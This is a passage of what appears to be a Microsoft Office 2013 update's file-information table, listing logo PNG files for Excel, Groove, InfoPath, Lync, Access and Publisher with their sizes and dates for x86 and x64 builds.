excellogo.contrast-black_scale-140.png| | 2571| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale180.png| excellogo.contrast-black_scale-180.png| | 3253| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale80.png| excellogo.contrast-black_scale-80.png| | 1288| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale100.png| excellogo.contrast-white_scale-100.png| | 1649| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale140.png| excellogo.contrast-white_scale-140.png| | 2556| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale180.png| excellogo.contrast-white_scale-180.png| | 3290| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale80.png| excellogo.contrast-white_scale-80.png| | 1303| 14-Sep-22| 01:05 \nexcellogo.scale100.png| excellogo.scale-100.png| | 1706| 14-Sep-22| 01:05 \nexcellogo.scale140.png| excellogo.scale-140.png| | 2511| 14-Sep-22| 01:05 \nexcellogo.scale180.png| 
excellogo.scale-180.png| | 3120| 14-Sep-22| 01:05 \nexcellogo.scale80.png| excellogo.scale-80.png| | 1402| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale100.png| excellogosmall.contrast-black_scale-100.png| | 1085| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale140.png| excellogosmall.contrast-black_scale-140.png| | 1339| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale180.png| excellogosmall.contrast-black_scale-180.png| | 2028| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale80.png| excellogosmall.contrast-black_scale-80.png| | 811| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale100.png| excellogosmall.contrast-white_scale-100.png| | 1053| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale140.png| excellogosmall.contrast-white_scale-140.png| | 1315| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale180.png| excellogosmall.contrast-white_scale-180.png| | 1927| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale80.png| excellogosmall.contrast-white_scale-80.png| | 772| 14-Sep-22| 01:05 \nexcellogosmall.scale100.png| excellogosmall.scale-100.png| | 1208| 14-Sep-22| 01:05 \nexcellogosmall.scale140.png| excellogosmall.scale-140.png| | 1454| 14-Sep-22| 01:05 \nexcellogosmall.scale180.png| excellogosmall.scale-180.png| | 2015| 14-Sep-22| 01:05 \nexcellogosmall.scale80.png| excellogosmall.scale-80.png| | 886| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale100.png| firstrunlogo.contrast-black_scale-100.png| | 1125| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale140.png| firstrunlogo.contrast-black_scale-140.png| | 1689| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale180.png| firstrunlogo.contrast-black_scale-180.png| | 2181| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale80.png| firstrunlogo.contrast-black_scale-80.png| | 850| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale100.png| firstrunlogo.contrast-white_scale-100.png| | 1196| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale140.png| 
firstrunlogo.contrast-white_scale-140.png| | 1817| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale180.png| firstrunlogo.contrast-white_scale-180.png| | 2352| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale80.png| firstrunlogo.contrast-white_scale-80.png| | 901| 14-Sep-22| 01:05 \nfirstrunlogo.scale100.png| firstrunlogo.scale-100.png| | 15557| 14-Sep-22| 01:05 \nfirstrunlogo.scale140.png| firstrunlogo.scale-140.png| | 16184| 14-Sep-22| 01:05 \nfirstrunlogo.scale180.png| firstrunlogo.scale-180.png| | 16534| 14-Sep-22| 01:05 \nfirstrunlogo.scale80.png| firstrunlogo.scale-80.png| | 15298| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale100.png| firstrunlogosmall.contrast-black_scale-100.png| | 682| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale140.png| firstrunlogosmall.contrast-black_scale-140.png| | 932| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale180.png| firstrunlogosmall.contrast-black_scale-180.png| | 1295| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale80.png| firstrunlogosmall.contrast-black_scale-80.png| | 497| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale100.png| firstrunlogosmall.contrast-white_scale-100.png| | 737| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale140.png| firstrunlogosmall.contrast-white_scale-140.png| | 981| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale180.png| firstrunlogosmall.contrast-white_scale-180.png| | 1389| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale80.png| firstrunlogosmall.contrast-white_scale-80.png| | 523| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale100.png| firstrunlogosmall.scale-100.png| | 15190| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale140.png| firstrunlogosmall.scale-140.png| | 15439| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale180.png| firstrunlogosmall.scale-180.png| | 15888| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale80.png| firstrunlogosmall.scale-80.png| | 15004| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale100.png| 
groovelogo.contrast-black_scale-100.png| | 1609| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale140.png| groovelogo.contrast-black_scale-140.png| | 2318| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale180.png| groovelogo.contrast-black_scale-180.png| | 3184| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale80.png| groovelogo.contrast-black_scale-80.png| | 1200| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale100.png| groovelogo.contrast-white_scale-100.png| | 1640| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale140.png| groovelogo.contrast-white_scale-140.png| | 2483| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale180.png| groovelogo.contrast-white_scale-180.png| | 3384| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale80.png| groovelogo.contrast-white_scale-80.png| | 1237| 14-Sep-22| 01:05 \ngroovelogo.scale100.png| groovelogo.scale-100.png| | 3090| 14-Sep-22| 01:05 \ngroovelogo.scale140.png| groovelogo.scale-140.png| | 4608| 14-Sep-22| 01:05 \ngroovelogo.scale180.png| groovelogo.scale-180.png| | 6574| 14-Sep-22| 01:05 \ngroovelogo.scale80.png| groovelogo.scale-80.png| | 2167| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale100.png| groovelogosmall.contrast-black_scale-100.png| | 994| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale140.png| groovelogosmall.contrast-black_scale-140.png| | 1358| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale180.png| groovelogosmall.contrast-black_scale-180.png| | 1917| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale80.png| groovelogosmall.contrast-black_scale-80.png| | 650| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale100.png| groovelogosmall.contrast-white_scale-100.png| | 974| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale140.png| groovelogosmall.contrast-white_scale-140.png| | 1295| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale180.png| groovelogosmall.contrast-white_scale-180.png| | 1849| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale80.png| 
groovelogosmall.contrast-white_scale-80.png| | 625| 14-Sep-22| 01:05 \ngroovelogosmall.scale100.png| groovelogosmall.scale-100.png| | 1941| 14-Sep-22| 01:05 \ngroovelogosmall.scale140.png| groovelogosmall.scale-140.png| | 2840| 14-Sep-22| 01:05 \ngroovelogosmall.scale180.png| groovelogosmall.scale-180.png| | 4066| 14-Sep-22| 01:05 \ngroovelogosmall.scale80.png| groovelogosmall.scale-80.png| | 1335| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale100.png| infopathlogo.contrast-black_scale-100.png| | 1552| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale140.png| infopathlogo.contrast-black_scale-140.png| | 2344| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale180.png| infopathlogo.contrast-black_scale-180.png| | 2850| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale80.png| infopathlogo.contrast-black_scale-80.png| | 1233| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale100.png| infopathlogo.contrast-white_scale-100.png| | 1545| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale140.png| infopathlogo.contrast-white_scale-140.png| | 2303| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale180.png| infopathlogo.contrast-white_scale-180.png| | 2812| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale80.png| infopathlogo.contrast-white_scale-80.png| | 1229| 14-Sep-22| 01:05 \ninfopathlogo.scale100.png| infopathlogo.scale-100.png| | 1602| 14-Sep-22| 01:05 \ninfopathlogo.scale140.png| infopathlogo.scale-140.png| | 2352| 14-Sep-22| 01:05 \ninfopathlogo.scale180.png| infopathlogo.scale-180.png| | 2819| 14-Sep-22| 01:05 \ninfopathlogo.scale80.png| infopathlogo.scale-80.png| | 1295| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale100.png| infopathlogosmall.contrast-black_scale-100.png| | 1050| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale140.png| infopathlogosmall.contrast-black_scale-140.png| | 1322| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale180.png| infopathlogosmall.contrast-black_scale-180.png| | 1942| 14-Sep-22| 01:05 
\ninfopathlogosmall.contrastblack_scale80.png| infopathlogosmall.contrast-black_scale-80.png| | 732| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale100.png| infopathlogosmall.contrast-white_scale-100.png| | 1047| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale140.png| infopathlogosmall.contrast-white_scale-140.png| | 1310| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale180.png| infopathlogosmall.contrast-white_scale-180.png| | 1900| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale80.png| infopathlogosmall.contrast-white_scale-80.png| | 725| 14-Sep-22| 01:05 \ninfopathlogosmall.scale100.png| infopathlogosmall.scale-100.png| | 1109| 14-Sep-22| 01:05 \ninfopathlogosmall.scale140.png| infopathlogosmall.scale-140.png| | 1364| 14-Sep-22| 01:05 \ninfopathlogosmall.scale180.png| infopathlogosmall.scale-180.png| | 1927| 14-Sep-22| 01:05 \ninfopathlogosmall.scale80.png| infopathlogosmall.scale-80.png| | 774| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale100.png| lynclogo.contrast-black_scale-100.png| | 2528| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale140.png| lynclogo.contrast-black_scale-140.png| | 3857| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale180.png| lynclogo.contrast-black_scale-180.png| | 5403| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale80.png| lynclogo.contrast-black_scale-80.png| | 1854| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale100.png| lynclogo.contrast-white_scale-100.png| | 2519| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale140.png| lynclogo.contrast-white_scale-140.png| | 3845| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale180.png| lynclogo.contrast-white_scale-180.png| | 5504| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale80.png| lynclogo.contrast-white_scale-80.png| | 1853| 14-Sep-22| 01:05 \nlynclogo.scale100.png| lynclogo.scale-100.png| | 2704| 14-Sep-22| 01:05 \nlynclogo.scale140.png| lynclogo.scale-140.png| | 4055| 14-Sep-22| 01:05 \nlynclogo.scale180.png| lynclogo.scale-180.png| | 5493| 14-Sep-22| 
#### For all supported x64-based versions of Office 2013

File identifier| File name| File version| File size| Date| Time
---|---|---|---|---|---
excellogo.contrast-white_scale-180.png| | 3290| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale80.png| excellogo.contrast-white_scale-80.png| | 1303| 14-Sep-22| 01:05 \nexcellogo.scale100.png| excellogo.scale-100.png| | 1706| 14-Sep-22| 01:05 \nexcellogo.scale140.png| excellogo.scale-140.png| | 2511| 14-Sep-22| 01:05 \nexcellogo.scale180.png| excellogo.scale-180.png| | 3120| 14-Sep-22| 01:05 \nexcellogo.scale80.png| excellogo.scale-80.png| | 1402| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale100.png| excellogosmall.contrast-black_scale-100.png| | 1085| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale140.png| excellogosmall.contrast-black_scale-140.png| | 1339| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale180.png| excellogosmall.contrast-black_scale-180.png| | 2028| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale80.png| excellogosmall.contrast-black_scale-80.png| | 811| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale100.png| excellogosmall.contrast-white_scale-100.png| | 1053| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale140.png| excellogosmall.contrast-white_scale-140.png| | 1315| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale180.png| excellogosmall.contrast-white_scale-180.png| | 1927| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale80.png| excellogosmall.contrast-white_scale-80.png| | 772| 14-Sep-22| 01:05 \nexcellogosmall.scale100.png| excellogosmall.scale-100.png| | 1208| 14-Sep-22| 01:05 \nexcellogosmall.scale140.png| excellogosmall.scale-140.png| | 1454| 14-Sep-22| 01:05 \nexcellogosmall.scale180.png| excellogosmall.scale-180.png| | 2015| 14-Sep-22| 01:05 \nexcellogosmall.scale80.png| excellogosmall.scale-80.png| | 886| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale100.png| firstrunlogo.contrast-black_scale-100.png| | 1125| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale140.png| firstrunlogo.contrast-black_scale-140.png| | 1689| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale180.png| 
firstrunlogo.contrast-black_scale-180.png| | 2181| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale80.png| firstrunlogo.contrast-black_scale-80.png| | 850| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale100.png| firstrunlogo.contrast-white_scale-100.png| | 1196| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale140.png| firstrunlogo.contrast-white_scale-140.png| | 1817| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale180.png| firstrunlogo.contrast-white_scale-180.png| | 2352| 14-Sep-22| 01:05 \nfirstrunlogo.contrastwhite_scale80.png| firstrunlogo.contrast-white_scale-80.png| | 901| 14-Sep-22| 01:05 \nfirstrunlogo.scale100.png| firstrunlogo.scale-100.png| | 15557| 14-Sep-22| 01:05 \nfirstrunlogo.scale140.png| firstrunlogo.scale-140.png| | 16184| 14-Sep-22| 01:05 \nfirstrunlogo.scale180.png| firstrunlogo.scale-180.png| | 16534| 14-Sep-22| 01:05 \nfirstrunlogo.scale80.png| firstrunlogo.scale-80.png| | 15298| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale100.png| firstrunlogosmall.contrast-black_scale-100.png| | 682| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale140.png| firstrunlogosmall.contrast-black_scale-140.png| | 932| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale180.png| firstrunlogosmall.contrast-black_scale-180.png| | 1295| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastblack_scale80.png| firstrunlogosmall.contrast-black_scale-80.png| | 497| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale100.png| firstrunlogosmall.contrast-white_scale-100.png| | 737| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale140.png| firstrunlogosmall.contrast-white_scale-140.png| | 981| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale180.png| firstrunlogosmall.contrast-white_scale-180.png| | 1389| 14-Sep-22| 01:05 \nfirstrunlogosmall.contrastwhite_scale80.png| firstrunlogosmall.contrast-white_scale-80.png| | 523| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale100.png| firstrunlogosmall.scale-100.png| | 15190| 14-Sep-22| 01:05 
\nfirstrunlogosmall.scale140.png| firstrunlogosmall.scale-140.png| | 15439| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale180.png| firstrunlogosmall.scale-180.png| | 15888| 14-Sep-22| 01:05 \nfirstrunlogosmall.scale80.png| firstrunlogosmall.scale-80.png| | 15004| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale100.png| groovelogo.contrast-black_scale-100.png| | 1609| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale140.png| groovelogo.contrast-black_scale-140.png| | 2318| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale180.png| groovelogo.contrast-black_scale-180.png| | 3184| 14-Sep-22| 01:05 \ngroovelogo.contrastblack_scale80.png| groovelogo.contrast-black_scale-80.png| | 1200| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale100.png| groovelogo.contrast-white_scale-100.png| | 1640| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale140.png| groovelogo.contrast-white_scale-140.png| | 2483| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale180.png| groovelogo.contrast-white_scale-180.png| | 3384| 14-Sep-22| 01:05 \ngroovelogo.contrastwhite_scale80.png| groovelogo.contrast-white_scale-80.png| | 1237| 14-Sep-22| 01:05 \ngroovelogo.scale100.png| groovelogo.scale-100.png| | 3090| 14-Sep-22| 01:05 \ngroovelogo.scale140.png| groovelogo.scale-140.png| | 4608| 14-Sep-22| 01:05 \ngroovelogo.scale180.png| groovelogo.scale-180.png| | 6574| 14-Sep-22| 01:05 \ngroovelogo.scale80.png| groovelogo.scale-80.png| | 2167| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale100.png| groovelogosmall.contrast-black_scale-100.png| | 994| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale140.png| groovelogosmall.contrast-black_scale-140.png| | 1358| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale180.png| groovelogosmall.contrast-black_scale-180.png| | 1917| 14-Sep-22| 01:05 \ngroovelogosmall.contrastblack_scale80.png| groovelogosmall.contrast-black_scale-80.png| | 650| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale100.png| groovelogosmall.contrast-white_scale-100.png| | 
974| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale140.png| groovelogosmall.contrast-white_scale-140.png| | 1295| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale180.png| groovelogosmall.contrast-white_scale-180.png| | 1849| 14-Sep-22| 01:05 \ngroovelogosmall.contrastwhite_scale80.png| groovelogosmall.contrast-white_scale-80.png| | 625| 14-Sep-22| 01:05 \ngroovelogosmall.scale100.png| groovelogosmall.scale-100.png| | 1941| 14-Sep-22| 01:05 \ngroovelogosmall.scale140.png| groovelogosmall.scale-140.png| | 2840| 14-Sep-22| 01:05 \ngroovelogosmall.scale180.png| groovelogosmall.scale-180.png| | 4066| 14-Sep-22| 01:05 \ngroovelogosmall.scale80.png| groovelogosmall.scale-80.png| | 1335| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale100.png| infopathlogo.contrast-black_scale-100.png| | 1552| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale140.png| infopathlogo.contrast-black_scale-140.png| | 2344| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale180.png| infopathlogo.contrast-black_scale-180.png| | 2850| 14-Sep-22| 01:05 \ninfopathlogo.contrastblack_scale80.png| infopathlogo.contrast-black_scale-80.png| | 1233| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale100.png| infopathlogo.contrast-white_scale-100.png| | 1545| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale140.png| infopathlogo.contrast-white_scale-140.png| | 2303| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale180.png| infopathlogo.contrast-white_scale-180.png| | 2812| 14-Sep-22| 01:05 \ninfopathlogo.contrastwhite_scale80.png| infopathlogo.contrast-white_scale-80.png| | 1229| 14-Sep-22| 01:05 \ninfopathlogo.scale100.png| infopathlogo.scale-100.png| | 1602| 14-Sep-22| 01:05 \ninfopathlogo.scale140.png| infopathlogo.scale-140.png| | 2352| 14-Sep-22| 01:05 \ninfopathlogo.scale180.png| infopathlogo.scale-180.png| | 2819| 14-Sep-22| 01:05 \ninfopathlogo.scale80.png| infopathlogo.scale-80.png| | 1295| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale100.png| 
infopathlogosmall.contrast-black_scale-100.png| | 1050| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale140.png| infopathlogosmall.contrast-black_scale-140.png| | 1322| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale180.png| infopathlogosmall.contrast-black_scale-180.png| | 1942| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastblack_scale80.png| infopathlogosmall.contrast-black_scale-80.png| | 732| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale100.png| infopathlogosmall.contrast-white_scale-100.png| | 1047| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale140.png| infopathlogosmall.contrast-white_scale-140.png| | 1310| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale180.png| infopathlogosmall.contrast-white_scale-180.png| | 1900| 14-Sep-22| 01:05 \ninfopathlogosmall.contrastwhite_scale80.png| infopathlogosmall.contrast-white_scale-80.png| | 725| 14-Sep-22| 01:05 \ninfopathlogosmall.scale100.png| infopathlogosmall.scale-100.png| | 1109| 14-Sep-22| 01:05 \ninfopathlogosmall.scale140.png| infopathlogosmall.scale-140.png| | 1364| 14-Sep-22| 01:05 \ninfopathlogosmall.scale180.png| infopathlogosmall.scale-180.png| | 1927| 14-Sep-22| 01:05 \ninfopathlogosmall.scale80.png| infopathlogosmall.scale-80.png| | 774| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale100.png| lynclogo.contrast-black_scale-100.png| | 2528| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale140.png| lynclogo.contrast-black_scale-140.png| | 3857| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale180.png| lynclogo.contrast-black_scale-180.png| | 5403| 14-Sep-22| 01:05 \nlynclogo.contrastblack_scale80.png| lynclogo.contrast-black_scale-80.png| | 1854| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale100.png| lynclogo.contrast-white_scale-100.png| | 2519| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale140.png| lynclogo.contrast-white_scale-140.png| | 3845| 14-Sep-22| 01:05 \nlynclogo.contrastwhite_scale180.png| lynclogo.contrast-white_scale-180.png| | 5504| 14-Sep-22| 01:05 
\nlynclogo.contrastwhite_scale80.png| lynclogo.contrast-white_scale-80.png| | 1853| 14-Sep-22| 01:05 \nlynclogo.scale100.png| lynclogo.scale-100.png| | 2704| 14-Sep-22| 01:05 \nlynclogo.scale140.png| lynclogo.scale-140.png| | 4055| 14-Sep-22| 01:05 \nlynclogo.scale180.png| lynclogo.scale-180.png| | 5493| 14-Sep-22| 01:05 \nlynclogo.scale80.png| lynclogo.scale-80.png| | 2039| 14-Sep-22| 01:05 \nlynclogosmall.contrastblack_scale100.png| lynclogosmall.contrast-black_scale-100.png| | 1536| 14-Sep-22| 01:05 \nlynclogosmall.contrastblack_scale140.png| lynclogosmall.contrast-black_scale-140.png| | 2138| 14-Sep-22| 01:05 \nlynclogosmall.contrastblack_scale180.png| lynclogosmall.contrast-black_scale-180.png| | 3164| 14-Sep-22| 01:05 \nlynclogosmall.contrastblack_scale80.png| lynclogosmall.contrast-black_scale-80.png| | 1008| 14-Sep-22| 01:05 \nlynclogosmall.contrastwhite_scale100.png| lynclogosmall.contrast-white_scale-100.png| | 1508| 14-Sep-22| 01:05 \nlynclogosmall.contrastwhite_scale140.png| lynclogosmall.contrast-white_scale-140.png| | 2085| 14-Sep-22| 01:05 \nlynclogosmall.contrastwhite_scale180.png| lynclogosmall.contrast-white_scale-180.png| | 3110| 14-Sep-22| 01:05 \nlynclogosmall.contrastwhite_scale80.png| lynclogosmall.contrast-white_scale-80.png| | 1009| 14-Sep-22| 01:05 \nlynclogosmall.scale100.png| lynclogosmall.scale-100.png| | 1796| 14-Sep-22| 01:05 \nlynclogosmall.scale140.png| lynclogosmall.scale-140.png| | 2417| 14-Sep-22| 01:05 \nlynclogosmall.scale180.png| lynclogosmall.scale-180.png| | 3571| 14-Sep-22| 01:05 \nlynclogosmall.scale80.png| lynclogosmall.scale-80.png| | 1203| 14-Sep-22| 01:05 \nmsaccesslogo.contrastblack_scale100.png| msaccesslogo.contrast-black_scale-100.png| | 2435| 14-Sep-22| 01:05 \nmsaccesslogo.contrastblack_scale140.png| msaccesslogo.contrast-black_scale-140.png| | 3298| 14-Sep-22| 01:05 \nmsaccesslogo.contrastblack_scale180.png| msaccesslogo.contrast-black_scale-180.png| | 4701| 14-Sep-22| 01:05 
\nmsaccesslogo.contrastblack_scale80.png| msaccesslogo.contrast-black_scale-80.png| | 1871| 14-Sep-22| 01:05 \nmsaccesslogo.contrastwhite_scale100.png| msaccesslogo.contrast-white_scale-100.png| | 2465| 14-Sep-22| 01:05 \nmsaccesslogo.contrastwhite_scale140.png| msaccesslogo.contrast-white_scale-140.png| | 3392| 14-Sep-22| 01:05 \nmsaccesslogo.contrastwhite_scale180.png| msaccesslogo.contrast-white_scale-180.png| | 4810| 14-Sep-22| 01:05 \nmsaccesslogo.contrastwhite_scale80.png| msaccesslogo.contrast-white_scale-80.png| | 1894| 14-Sep-22| 01:05 \nmsaccesslogo.scale100.png| msaccesslogo.scale-100.png| | 2537| 14-Sep-22| 01:05 \nmsaccesslogo.scale140.png| msaccesslogo.scale-140.png| | 3315| 14-Sep-22| 01:05 \nmsaccesslogo.scale180.png| msaccesslogo.scale-180.png| | 4845| 14-Sep-22| 01:05 \nmsaccesslogo.scale80.png| msaccesslogo.scale-80.png| | 2000| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastblack_scale100.png| msaccesslogosmall.contrast-black_scale-100.png| | 1644| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastblack_scale140.png| msaccesslogosmall.contrast-black_scale-140.png| | 2116| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastblack_scale180.png| msaccesslogosmall.contrast-black_scale-180.png| | 2807| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastblack_scale80.png| msaccesslogosmall.contrast-black_scale-80.png| | 1017| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastwhite_scale100.png| msaccesslogosmall.contrast-white_scale-100.png| | 1619| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastwhite_scale140.png| msaccesslogosmall.contrast-white_scale-140.png| | 2108| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastwhite_scale180.png| msaccesslogosmall.contrast-white_scale-180.png| | 2816| 14-Sep-22| 01:05 \nmsaccesslogosmall.contrastwhite_scale80.png| msaccesslogosmall.contrast-white_scale-80.png| | 1007| 14-Sep-22| 01:05 \nmsaccesslogosmall.scale100.png| msaccesslogosmall.scale-100.png| | 1767| 14-Sep-22| 01:05 \nmsaccesslogosmall.scale140.png| msaccesslogosmall.scale-140.png| 
| 2252| 14-Sep-22| 01:05 \nmsaccesslogosmall.scale180.png| msaccesslogosmall.scale-180.png| | 2815| 14-Sep-22| 01:05 \nmsaccesslogosmall.scale80.png| msaccesslogosmall.scale-80.png| | 1144| 14-Sep-22| 01:05 \nmspublogo.contrastblack_scale100.png| mspublogo.contrast-black_scale-100.png| | 1537| 14-Sep-22| 01:05 \nmspublogo.contrastblack_scale140.png| mspublogo.contrast-black_scale-140.png| | 2271| 14-Sep-22| 01:05 \nmspublogo.contrastblack_scale180.png| mspublogo.contrast-black_scale-180.png| | 2973| 14-Sep-22| 01:05 \nmspublogo.contrastblack_scale80.png| mspublogo.contrast-black_scale-80.png| | 1238| 14-Sep-22| 01:05 \nmspublogo.contrastwhite_scale100.png| mspublogo.contrast-white_scale-100.png| | 1548| 14-Sep-22| 01:05 \nmspublogo.contrastwhite_scale140.png| mspublogo.contrast-white_scale-140.png| | 2276| 14-Sep-22| 01:05 \nmspublogo.contrastwhite_scale180.png| mspublogo.contrast-white_scale-180.png| | 2969| 14-Sep-22| 01:05 \nmspublogo.contrastwhite_scale80.png| mspublogo.contrast-white_scale-80.png| | 1259| 14-Sep-22| 01:05 \nmspublogo.scale100.png| mspublogo.scale-100.png| | 1571| 14-Sep-22| 01:05 \nmspublogo.scale140.png| mspublogo.scale-140.png| | 2249| 14-Sep-22| 01:05 \nmspublogo.scale180.png| mspublogo.scale-180.png| | 2866| 14-Sep-22| 01:05 \nmspublogo.scale80.png| mspublogo.scale-80.png| | 1288| 14-Sep-22| 01:05 \nmspublogosmall.contrastblack_scale100.png| mspublogosmall.contrast-black_scale-100.png| | 1047| 14-Sep-22| 01:05 \nmspublogosmall.contrastblack_scale140.png| mspublogosmall.contrast-black_scale-140.png| | 1300| 14-Sep-22| 01:05 